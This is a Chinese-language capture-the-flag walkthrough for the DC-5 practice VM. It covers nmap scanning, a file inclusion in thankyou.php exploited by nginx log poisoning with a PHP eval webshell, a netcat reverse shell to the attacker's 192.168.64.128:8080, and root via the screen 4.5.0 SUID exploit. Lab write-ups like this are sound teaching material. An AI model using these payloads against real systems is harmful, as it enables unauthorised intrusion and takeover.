DC-5靶机攻略

DC-5靶机通关攻略

信息收集

主机发现

nmap -sP 192.168.64.0/24 -oN nmap_sp

目标主机ip地址为：192.168.64.129

端口扫描

nmap -A 192.168.64.129 -oN namp_a
发现80

访问80端口

发现只有Contact页面有用,

尝试提交内容

刷新发现底部时间变化

推测这里存在文件包含

目录扫描

御剑扫描

访问footer.php

刷新

确定thankyou.php包含了footer.php，存在文件包含，可以尝试文件包含漏洞

渗透

由于该网站web中间件为nginx，网站上的每一步操作都会被写入日志文件

bp抓包get中写入
<?php phpinfo(); ?>
成功包含，证明存在文件包含漏洞

访问http://192.168.64.129/thankyou.php?file=/var/log/nginx/access.log

反弹shell

向get中写入一句话木马
<?php @eval($_REQUEST['abc']);?>
蚁剑连接

kali监听8080
nc -lvvp 8080

反弹shell
nc 192.168.64.128 8080 -e /bin/sh 

获得交互性shell

python -c 'import pty;pty.spawn("/bin/sh")'

find / -perm -4000 2>/dev/null  查询有suid权限的命令，使用时有所属者权限
发现screen 4.5.0  screen是多重视窗管理工具，通常只有在使用telnet登入主机会使用

漏洞查询

kali中查询
searchsploit screen 4.5.0
cat /usr/share/exploitdb/exploits/linux/local/41154.sh

漏洞利用

拷贝脚本

mkdir screen
cp /usr/share/exploitdb/exploits/linux/local/41154.sh /root/screen

将代码分三段保存

按照说明进行编译

gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
由于我们现在没有权限将脚本放到目标主机，所以注意脚本说明和当前路径问题

脚本上传到tmp目录中

cd /tmp
./run.sh 发现报错

ls -l

-rw-r--r-- 1 www-data www-data 16136 Mar 12 05:40 libhax.so   
-rw-r--r-- 1 www-data www-data 16816 Mar 12 05:40 rootshell                                     
-rw-r--r-- 1 www-data www-data   248 Mar 12 05:40 run.sh  

发现run.sh没有执行权限

chmod 777 run.sh   给权限

./run.sh
id 发现拿到root权限

cd /root
ls
cat  thisistheflag.txt
通关！！